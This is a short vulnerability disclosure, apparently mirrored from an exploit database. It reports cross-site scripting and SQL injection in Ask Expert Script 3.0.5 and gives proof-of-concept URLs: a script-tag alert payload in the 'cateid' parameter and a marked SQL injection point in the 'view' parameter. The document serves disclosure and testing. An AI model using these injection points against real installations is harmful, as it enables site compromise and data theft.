# Exploit Title: Ask Expert Script 3.0.5 - Cross Site Scripting / SQL Injection # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 19, 2019 # Vendor Homepage: http://www.phpscriptsmall.com/ # Software Link : https://www.phpscriptsmall.com/product/ask-expert-script/ # Tested Version: 3.0.5 # Tested on: Kali linux, Windows 8.1 # PoC: # Cross Site Scripting: # http://localhost/[PATH]/categorysearch.php?cateid=[XSS] # http://localhost/[PATH]/categorysearch.php?cateid=<scRiPt>alert(1)</ScrIpT> # SQL Injection: # http://localhost/[PATH]/list-details.php?view=[SQL]
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
